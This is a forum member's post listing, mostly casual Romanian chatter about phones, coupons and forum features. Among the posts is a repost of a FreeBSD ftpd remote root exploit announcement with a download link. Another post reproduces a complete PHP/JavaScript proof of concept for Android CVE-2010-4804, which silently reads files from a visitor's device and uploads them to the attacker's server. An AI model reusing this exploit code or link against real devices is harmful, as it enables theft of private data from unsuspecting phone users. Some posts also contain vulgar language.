Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. E ok, au mai ramas join date (Mar 2008) si Rep Power(5). ps; si pe tema RST Beta,la Infractions e fontu negru la coloanele Expires,Points,date .
  2. /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * ***************************************************************************** * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: http://www.exploit-db.com/sploits/7350roaringbeastv3.tar sursa
  3. <?php /* * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities * Bugtraq ID: 48256 * CVE: CVE-2010-4804 * Affected: Android < 2.3.4 * Author: Thomas Cannon * Discovered: 18-Nov-2010 * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ * * Filename: poc.php * Instructions: Specify files you want to upload in filenames array. Host this php file * on a server and visit it using the Android Browser. Some builds of Android * may require adjustments to the script, for example when a German build was * tested it downloaded the payload as .htm instead of .html, even though .html * was specified. * * Tested on: HTC Desire (UK Version) with Android 2.2 */ // List of the files on the device that we want to upload to our server $filenames = array("/proc/version","/sdcard/img.jpg"); // Determine the full URL of this script $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; // Stage 0: Display introduction text and a link to start the PoC. function stage0($scripturl) { echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the // context of the local device - this is the vulnerability. function stage1($scripturl) { echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">"; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> <html> <body> <script language='javascript'> var filenames = Array('<?php echo implode("','",$filenames); ?>'); var filecontents = new Array(); function processBinary(xmlhttp) { data = xmlhttp.responseText; r = ''; size = data.length; for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff); return r; } function getFiles(filenames) { for (var filename in filenames) { filename = filenames[filename]; xhr = new XMLHttpRequest(); xhr.open('GET', filename, false); xhr.overrideMimeType('text/plain; charset=x-user-defined'); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } } xhr.send(); } } function addField(form, name, value) { var fe = document.createElement('input'); fe.setAttribute('type', 'hidden'); fe.setAttribute('name', name); fe.setAttribute('value', value); form.appendChild(fe); } function uploadFiles(filecontents) { var form = document.createElement('form'); form.setAttribute('method', 'POST'); form.setAttribute('enctype', 'multipart/form-data'); form.setAttribute('action', '<?=$scripturl?>?stage=3'); var i = 0; for (var filename in filecontents) { addField(form, 'filename'+i, btoa(filename)); addField(form, 'data'+i, filecontents[filename]); i += 1; } document.body.appendChild(form); form.submit(); } getFiles(filenames); uploadFiles(filecontents); </script> </body> </html> <?php } // Stage 3: Read the file names and contents sent by the payload and write to a file on the server. function stage3() { $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!"); fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); fclose($fp); echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!"; } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; default: stage0($scripturl); break; } ?> sursa
  4. Probabil nu mei merg, am incrcat cu toate
  5. Are cineva vreun cupon de reducere sau orice pt unu din magazinele astea?(reducere peste 10% sau peste 50 ron) Ne intelegem pe privat/ym/skype/porumbel mesager
  6. Apropo de asta: am un id (presupunem X@ yahoo.com)care imi apare offline chiar daca persoana respectiva e online.Am incercat sa sterg din lista cu tot cu adress book /orice ;dupa ce fac asta imi apare online pana la primul logout, dupa asta iar offline;de la ce casa ma-sii e? (reinstall yahu checked,doesn't work)
  7. Bine ai venit!Succes!
  8. Eu am vreo 4 discuri rewritable noname de vreo 2 ani.Rescrise cu imagini windows de n ori si n-au nici pe drecu
  9. numa io am adaugat 40 unde sunt mai putine (Gen Help Center : centrul porno) dai si Vote down la varianta buna
  10. nu is aceleasi plm nuj cum le afiseaza.Gasesti altele ca is bune. cine pula mea a bagat Wife = shemale? sau curva 'Sent from mobile: Imi plac baietii'
  11. ''zi la {name} ca-i smecher'' dati vote up repede (e la Give Credit)
  12. cold reset (il stimgi) si apesi tasta * , tasta 3 si tasta de raspuns (verde).In timp ce te chinui sa le tii apasate iti mai tre un deget sa il pornesti
  13. platforma: DCT4+ incearca asta: http: //unlock. nokiafree.org/download.php sau http ://unlock .nokiafree.org/1209 nu am testat nimic
  14. x-plore ca file manager si alte aplcai tii de la lonelycatgames .com
  15. ringtone : Zippyshare.com - crank_ring.mp3 sms tone : Zippyshare.com - Scary.mp3 astea le folosesc de vreun an si ceva
  16. sterge in cacat semnatura cu refferal

  17. Vezi topicul lui 1337 despre Social Engineering la firme mari.In cazu tau e totu legal
  18. nu e o scuza ca e copy/paste.Cand copiezi ceva aici te supui regulilor de aici nu de pe cacatforums
  19. eu nu cunostinte? 31,12 si 94 is numerele tale norocoase?
  20. nForce nu e chipsetul placii de baza? + ripoff= placa de sunet integrata
  21. Si mie mi-a resetat tema si tot dar imi merg 720p-urile (html 5 enabled)
  22. da sa monteze gps nu vor futu-i in inima?
  23. Cunostinte?
  24. It might work but it isn't recommended on such pc (64 mb video ram)
  25. merge brici +rep
×
×
  • Create New...